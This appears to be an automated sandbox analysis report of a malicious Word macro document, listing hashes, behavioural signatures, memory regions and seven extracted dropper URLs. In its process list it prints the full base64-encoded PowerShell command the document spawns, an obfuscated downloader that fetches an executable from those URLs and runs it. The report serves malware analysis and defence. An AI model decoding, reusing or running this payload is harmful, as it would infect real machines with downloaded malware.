Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    08/05/2024, 16:34

General

  • Target

    25bcb78ec0c2780e1c06ada42968d9d7_JaffaCakes118.doc

  • Size

    170KB

  • MD5

    25bcb78ec0c2780e1c06ada42968d9d7

  • SHA1

    48dfb63d1a6dd107694daa9c2a3d7aba429406bf

  • SHA256

    db18e8e273721a438d28a0af0729005b92df1544c25418e5aec74b0395c1a5c1

  • SHA512

    36dbea58184f99f3ea196117fd1c28e011fd8fb62c0b7d5d765defc09d782a1f3e7b64ffbb377dd80efd08cb9bb96a960a15fc4918d1eac08cd5ba7f3e0afd1f

  • SSDEEP

    1536:x4d4qDv4d4qDPrdi1Ir77zOH98Wj2gpngR+a9AV/IH+mD7UZPfMclw0:VrfrzOH98ipghH+O7UZ3Mclw0

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://zhaniyasoft.ir/wp-content/file/ANEbg/

exe.dropper

http://visualblends.com/images/attach/nGKW/

exe.dropper

http://dagostim.com.br/rss/public/4xxkqIh/

exe.dropper

http://earthinnovation.org/gcfimpact/public/sXzPpHP/

exe.dropper

http://pcdesigns4you.com/wp-admin/public/eo8UUYeCUKx/

exe.dropper

http://www.weblabor.com.br/avisos/24206240720/

exe.dropper

http://pedroguinle.com/Tijuca-project/WAQgDjW/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\25bcb78ec0c2780e1c06ada42968d9d7_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2356
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:772
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABLAHQAYwB6AHYAdwAyAD0AKAAoACcASABkAHYANgAnACsAJwB1ACcAKQArACcAZQAwACcAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAVQBTAEUAUgBwAHIAbwBGAGkAbABlAFwAaQBwAEEAVQBEAGUAbwBcAEsAXwBKADkAYQB0AHIAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIAZQBDAFQATwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAHUAYABSAEkAdAB5AGAAcAByAE8AVABvAGAAQwBgAG8ATAAiACAAPQAgACgAJwB0ACcAKwAoACcAbABzACcAKwAnADEAMgAsACAAdAAnACkAKwAoACcAbABzACcAKwAnADEAJwApACsAKAAnADEALAAnACsAJwAgAHQAJwApACsAJwBsAHMAJwApADsAJABYAG0AbgBoAG4AbABxACAAPQAgACgAJwBTAGkAJwArACgAJwB5ACcAKwAnAGQAdwBkACcAKQApADsAJABYAHcAcwA1ADUAbABqAD0AKAAnAEkAJwArACgAJwA3ADQANAA2ACcAKwAnAGoAJwApACsAJwAyACcAKQA7ACQAQQBhAG4AaQA0AHYAZwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAFgAMgAnACsAJwBxAEkAJwApACsAKAAnAHAAJwArACcAYQB1AGQAZQBvACcAKQArACcAWAAyACcAKwAnAHEAJwArACgAJwBLAF8AagA5AGEAdAByACcAKwAnAFgAJwArACcAMgBxACcAKQApAC4AIgByAGAARQBwAEwAQQBgAEMARQAiACgAKABbAEMAaABhAFIAXQA4ADgAKwBbAEMAaABhAFIAXQA1ADAAKwBbAEMAaABhAFIAXQAxADEAMwApACwAJwBcACcAKQApACsAJABYAG0AbgBoAG4AbABxACsAKAAnAC4AJwArACgAJwBlAHgAJwArACcAZQAnACkAKQA7ACQAUwB6AG0AagBfAHQAdAA9ACgAJwBIACcAKwAoACcAYQAnACsAJwBkAGkANAA3AG8AJwApACkAOwAkAEUAYwBvAGMAMQA5ADYAPQAmACgAJwBuAGUAdwAnACsAJwAtAG8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAG4AZQB0AC4AVwBlAGIAYwBMAEkAZQBOAHQAOwAkAEgAcgBwAHIAZwA5AGwAPQAoACgAJwBoACcAKwAnAHQAJwArACcAdABwADoALwAnACkAKwAnAC8AegAnACsAJwBoACcAKwAoACcAYQAnACsAJwBuAGkAJwApACsAJwB5ACcAKwAnAGEAJwArACgAJwBzACcAKwAnAG8AZgAnACkAKwAoACcAdAAuAGkAJwArACcAcgAnACsAJwAvACcAKwAnAHcAcAAtAGMAbwBuAHQAJwApACsAKAAnAGUAbgB0ACcAKwAnAC8AJwApACsAKAAnAGYAJwArACcAaQBsAGUALwBBAE4ARQAnACsAJwBiAGcALwAqACcAKQArACcAaAB0ACcAKwAoACcAdAAnACsAJwBwADoAJwArACcALwAvAHYAJwApACsAKAAnAGkAcwB1ACcAKwAnAGEAJwApACsAKAAnAGwAYgAnACsAJwBsAGUAJwApACsAKAAnAG4AJwArACcAZABzAC4AJwApACsAJwBjAG8AJwArACgAJwBtAC8AaQBtACcAKwAnAGEAJwArACcAZwAnACkAKwAoACcAZQAnACsAJwBzAC8AYQAnACkAKwAoACcAdAAnACsAJwB0AGEAYwAnACkAKwAoACcAaAAnACsAJwAvAG4AJwArACcARwBLAFcALwAqAGgAJwArACcAdAB0AHAAOgAnACsAJwAvACcAKQArACcALwBkACcAKwAnAGEAZwAnACsAKAAnAG8AJwArACcAcwB0AGkAJwApACsAKAAnAG0AJwArACcALgBjACcAKQArACgAJwBvAG0ALgBiAHIAJwArACcALwAnACsAJwByAHMAJwApACsAKAAnAHMALwBwAHUAYgBsACcAKwAnAGkAJwArACcAYwAnACsAJwAvADQAeAB4ACcAKQArACcAawAnACsAKAAnAHEAJwArACcASQBoAC8AKgBoACcAKQArACgAJwB0ACcAKwAnAHQAcAA6AC8ALwBlACcAKQArACcAYQAnACsAKAAnAHIAdABoACcAKwAnAGkAbgBuACcAKQArACgAJwBvAHYAYQB0ACcAKwAnAGkAJwArACcAbwAnACkAKwAoACcAbgAuAG8AJwArACcAcgAnACkAKwAoACcAZwAvACcAKwAnAGcAYwBmACcAKwAnAGkAbQBwAGEAJwApACsAKAAnAGMAJwArACcAdAAvAHAAdQAnACkAKwAoACcAYgAnACsAJwBsAGkAJwApACsAKAAnAGMALwBzACcAKwAnAFgAJwArACcAegBQAHAASABQAC8AKgBoACcAKwAnAHQAJwArACcAdAAnACkAKwAnAHAAJwArACcAOgAvACcAKwAoACcALwBwACcAKwAnAGMAZABlACcAKQArACgAJwBzACcAKwAnAGkAZwBuAHMANAB5ACcAKwAnAG8AdQAnACkAKwAoACcALgBjACcAKwAnAG8AbQAvACcAKQArACcAdwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKwAnAG4ALwBwAHUAJwArACcAYgBsAGkAYwAvAGUAbwA4AFUAJwApACsAKAAnAFUAJwArACcAWQBlACcAKQArACgAJwBDAFUASwB4AC8AJwArACcAKgAnACkAKwAoACcAaAB0ACcAKwAnAHQAcAA6AC8AJwApACsAKAAnAC8AdwB3ACcAKwAnAHcAJwArACcALgB3AGUAYgAnACkAKwAnAGwAYQAnACsAKAAnAGIAbwAnACsAJwByAC4AYwBvACcAKwAnAG0ALgBiAHIALwBhAHYAJwArACcAaQBzAG8AcwAvACcAKQArACgAJwAyADQAJwArACcAMgAnACkAKwAoACcAMAA2ADIAJwArACcANAAwADcAMgAwAC8AJwArACcAKgAnACkAKwAoACcAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAJwArACcAOgAvAC8AcAAnACkAKwAoACcAZQAnACsAJwBkAHIAbwBnACcAKQArACgAJwB1ACcAKwAnAGkAbgAnACkAKwAoACcAbAAnACsAJwBlAC4AYwBvAG0ALwAnACsAJwBUAGkAagB1AGMAYQAtAHAAcgBvACcAKwAnAGoAZQAnACkAKwAnAGMAJwArACgAJwB0AC8AVwBBACcAKwAnAFEAJwApACsAKAAnAGcAJwArACcARABqACcAKQArACcAVwAvACcAKQAuACIAUwBQAGwAYABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABJADIAZwBkAGMANAA4AD0AKAAnAEIANAAnACsAKAAnAGkAJwArACcAXwAyAGwAJwApACsAJwBkACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAE0AZwBxAF8AcwB4AHkAIABpAG4AIAAkAEgAcgBwAHIAZwA5AGwAKQB7AHQAcgB5AHsAJABFAGMAbwBjADEAOQA2AC4AIgBkAGAAbwB3AG4ATABgAG8AYQBEAEYASQBsAEUAIgAoACQATQBnAHEAXwBzAHgAeQAsACAAJABBAGEAbgBpADQAdgBnACkAOwAkAFoAdQAwAG8AagA2ADMAPQAoACgAJwBDACcAKwAnAGgAcwAnACkAKwAnADQAJwArACgAJwBoAGIAJwArACcAcwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABBAGEAbgBpADQAdgBnACkALgAiAEwARQBOAEcAYABUAGgAIgAgAC0AZwBlACAAMgA5ADQAMwA1ACkAIAB7ACYAKAAnAEkAbgB2ACcAKwAnAG8AawBlAC0ASQB0ACcAKwAnAGUAbQAnACkAKAAkAEEAYQBuAGkANAB2AGcAKQA7ACQAVgBzAGUAZAB5AHYAOQA9ACgAJwBZAGgAJwArACgAJwBoAGwAJwArACcAdQB1AF8AJwApACkAOwBiAHIAZQBhAGsAOwAkAEYAagBpADkAXwB6AHIAPQAoACcAVgBhACcAKwAoACcANgBrAGUAZwAnACsAJwBhACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABUAHMAOAA1AF8ANQBsAD0AKAAoACcAQQB3ACcAKwAnAGwAeAB2AGMAJwApACsAJwB0ACcAKQA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2612

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            7d701449952c4f879ca4a030896db1da

            SHA1

            2d2ca9fe891511607ea83be85f6d6da3175b32ea

            SHA256

            1eb7711271efc5d0dd2ff9f7b1d55123a0d568b4575a9b6dece01bc93b6a4d65

            SHA512

            77ca7bf57ca02b0f290966b4e0a170a400ff2748bd40c5eadd0b31ec6e65bbcb2551f08e9ea5f9d63e1a5a32b4012a76f9c70875c2bb180122ad2247615b3b01

          • memory/2356-31-0x0000000005B80000-0x0000000005C80000-memory.dmp

            Filesize

            1024KB

          • memory/2356-50-0x0000000000390000-0x0000000000490000-memory.dmp

            Filesize

            1024KB

          • memory/2356-6-0x0000000000390000-0x0000000000490000-memory.dmp

            Filesize

            1024KB

          • memory/2356-7-0x0000000000390000-0x0000000000490000-memory.dmp

            Filesize

            1024KB

          • memory/2356-8-0x0000000000390000-0x0000000000490000-memory.dmp

            Filesize

            1024KB

          • memory/2356-13-0x0000000005B80000-0x0000000005C80000-memory.dmp

            Filesize

            1024KB

          • memory/2356-22-0x0000000005B80000-0x0000000005C80000-memory.dmp

            Filesize

            1024KB

          • memory/2356-0-0x000000002F771000-0x000000002F772000-memory.dmp

            Filesize

            4KB

          • memory/2356-2-0x000000007126D000-0x0000000071278000-memory.dmp

            Filesize

            44KB

          • memory/2356-68-0x000000007126D000-0x0000000071278000-memory.dmp

            Filesize

            44KB

          • memory/2356-33-0x0000000005B80000-0x0000000005C80000-memory.dmp

            Filesize

            1024KB

          • memory/2356-67-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2356-48-0x000000007126D000-0x0000000071278000-memory.dmp

            Filesize

            44KB

          • memory/2356-32-0x0000000005B80000-0x0000000005C80000-memory.dmp

            Filesize

            1024KB

          • memory/2356-51-0x0000000005B80000-0x0000000005C80000-memory.dmp

            Filesize

            1024KB

          • memory/2356-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2612-40-0x0000000001F10000-0x0000000001F18000-memory.dmp

            Filesize

            32KB

          • memory/2612-39-0x000000001B680000-0x000000001B962000-memory.dmp

            Filesize

            2.9MB